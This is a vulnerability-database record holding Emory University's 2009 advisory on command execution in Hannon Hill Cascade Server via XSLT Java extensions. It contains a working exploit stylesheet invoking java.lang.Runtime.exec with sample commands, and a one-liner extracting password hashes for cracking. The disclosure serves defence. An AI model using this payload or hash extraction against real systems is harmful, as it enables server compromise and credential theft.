{"href": "https://www.seebug.org/vuldb/ssvid-10851", "status": "poc", "bulletinFamily": "exploit", "modified": "2009-03-20T00:00:00", "title": "Hannon Hill Cascade Server Command Execution Vulnerability (post auth)", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-10851", "cvelist": [], "description": "No description provided by source.", "viewCount": 10, "published": "2009-03-20T00:00:00", "sourceData": "\n Emory University UTS Security Advisory EMORY-2009-01\r\n\r\nTopic: Command Execution in Hannon Hill Cascade Server\r\n\r\nOriginal release date: March 19, 2009\r\n\r\nSUMMARY\r\n=======\r\n\r\nHannon Hill\\'s Cascade Server product is vulnerable to a command\r\nexecution vulnerability. An attacker with access to an unprivileged\r\naccount within Cascade Server could exploit this vulnerability to run\r\narbitrary commands on the system with the privileges of the user who\r\nstarted Cascade Server.\r\n\r\nAFFECTED SOFTWARE\r\n=================\r\n\r\n* Cascade Server, all versions\r\n\r\nIMPACT\r\n======\r\n\r\nAn attacker with access to an unprivileged account within Cascade\r\nServer could exploit this vulnerability to run arbitrary commands on\r\nthe system with the privileges of the user who started Cascade Server.\r\n\r\nThe privileges of that user are necessarily sufficient to gain full\r\nadministrative control of Cascade Server - elevate privileges, conduct\r\ndenial of service, etc. \r\n\r\nDETAILS\r\n=======\r\n\r\nCascade Server allows its users to write XSLT stylesheets which it\r\nuses to transform XML source data into HTML or other formats. Cascade\r\nServer employs the Apache XML Project\\'s Xalan-Java XSLT processor to\r\nperform these transformations.\r\n\r\nThe Xalan-Java site states, \\"For those situations where you would like\r\nto augment the functionality of XSLT with calls to a procedural\r\nlanguage, Xalan-Java supports the creation and use of extension\r\nelements and extension functions... Extensions written in Java are\r\ndirectly supported by Xalan-Java.\\"\r\n\r\nBecause Cascade Server does not restrict the kind of XSLT code users\r\nare able to enter, any user with access to edit XSLT stylesheets can\r\ncause Cascade Server to execute arbitrary Java code. Using the\r\njava.lang.Runtime class, Java can run shell commands.\r\n\r\nWhile the privilege level of the Cascade Server process may prevent\r\nan attacker from gaining complete control of the host system, that\r\nprivilege level is necessarily sufficient to gain full control of\r\nCascade Server.\r\n\r\nSOLUTION\r\n========\r\n\r\nNo full solution exists at this time, but see Recommendations, below.\r\n\r\nHannon Hill is working to develop an official solution, and customers may\r\nwish to monitor its progress using the Hannon Hill ticketing system\r\n(requires a customer account).\r\n\r\nhttp://support.hannonhill.com/browse/CSCD-4753\r\n\r\nRECOMMENDATIONS\r\n===============\r\n\r\nIt may be possible to limit exposure in the following ways:\r\n\r\n* Grant the ability to edit XSLT files only to trusted users.\r\n\r\n* Enforce strong passwords for accounts with XSLT editing privileges.\r\nCascade stores user passwords as base64 encoded SHA1 hashes in the\r\npassword field of the cxml_user table, and can be audited with any\r\nSHA1-capable password cracker. For example, to extract hashes from a\r\nMySQL database in a form useable by John the Ripper\\'s\r\n(http://www.openwall.com/john/) raw-sha1 format:\r\n\r\necho \\"select userName, password from cxml_user\\" \\\\\r\n | mysql cascade \\\\\r\n | perl -i -ne \\'use MIME::Base64; /^(.*?)\\\\t(.*)/ && print \\"$1:\\" . unpack(\\"H*\\", decode_base64($2)).\\"\\\\n\\"\\'\r\n\r\n* Run Cascade Server as a user with as few privileges as possible.\r\n\r\n* On UNIX systems, run Cascade Server in a chroot environment.\r\n\r\nEXPLOIT\r\n=======\r\n\r\nThis exploit example assumes the ability to create and edit blocks,\r\nstylesheets, and pages. It\\'s also possible to exploit the\r\nvulnerability simply by modifying an existing stylesheet.\r\n\r\nCreate a stylesheet with the following contents:\r\n\r\n<?xml version=\\"1.0\\"?>\r\n<xsl:stylesheet exclude-result-prefixes=\\"java\\" version=\\"1.0\\"\r\n xmlns:bufferedreader=\\"xalan://java.io.BufferedReader\\"\r\n xmlns:inputstreamreader=\\"xalan://java.io.InputStreamReader\\"\r\n xmlns:java=\\"http://xml.apache.org/xalan/java\\"\r\n xmlns:process=\\"xalan://java.lang.Process\\"\r\n xmlns:runtime=\\"xalan://java.lang.Runtime\\"\r\n xmlns:xsl=\\"http://www.w3.org/1999/XSL/Transform\\">\r\n <xsl:variable name=\\"runtime\\" select=\\"runtime:getRuntime()\\"/>\r\n <xsl:template match=\\"//command\\"> \r\n <xsl:variable name=\\"process\\" select=\\"runtime:exec($runtime, string(.))\\"/>\r\n <xsl:variable name=\\"inputstream\\" select=\\"process:getInputStream($process)\\"/>\r\n <xsl:variable name=\\"inputstreamreader\\" select=\\"inputstreamreader:new($inputstream)\\"/>\r\n <xsl:variable name=\\"bufferedreader\\" select=\\"bufferedreader:new($inputstreamreader)\\"/>\r\n <p>\r\n Output: <xsl:value-of select=\\"bufferedreader:readLine($bufferedreader)\\"/><br/>\r\n </p>\r\n </xsl:template>\r\n</xsl:stylesheet>\r\n\r\nCreate an XML block with the following contents, substituting your own\r\ncommand or commands.\r\n\r\n<command>id</command>\r\n<command>uname -a</command>\r\n...\r\n\r\nCreate or edit a page using a template with at least one region defined.\r\nUnder the configuration tab, set Block to point to your XML block and\r\nStylesheet (AKA Layout in Cascade 5.7+) to point to your stylesheet.\r\n\r\nView the layout or preview tab for that page, and you should see the\r\noutput of your commands. Note that the above stylesheet is only able\r\nto display the first line of output.\r\n\r\nACKNOWLEDGMENTS\r\n===============\r\n\r\nThanks to Bradley Wagner and Hannon Hill in general for their quick\r\ninitial response to the problem.\r\n\r\nThanks to Amy Liu and Brett Goodwin of Hannon Hill for their \\"Advanced\r\nXSLT\\" talk at the 2008 Cascade Server User\\'s Conference, which\r\ninspired this research.\r\n\r\nDISCLAIMER\r\n==========\r\n\r\nThe information in this advisory is provided by Emory as a courtesy\r\nand without any representations or warranties. Recipients are\r\nadvised to conduct their own investigation and due diligence before\r\nrelying on its contents.\r\n\r\nVULNERABILTY HISTORY\r\n====================\r\n\r\n2008-10-01 Vulnerability discovered\r\n Hannon Hill notified\r\n Ticket opened in Hannon Hill issue tracker\r\n\r\n2008-10-15 Hannon Hill staff member assigned to the issue\r\n\r\n2009-02-23 Hannon Hill staff member reassigned\r\n\r\n2009-03-19 Initial revision of advisory published\n ", "id": "SSV:10851", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T18:56:04", "reporter": "Root", "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645303971, "score": 1659785532, "epss": 1678851499}}
Hannon Hill Cascade Server Command Execution Vulnerability (post auth)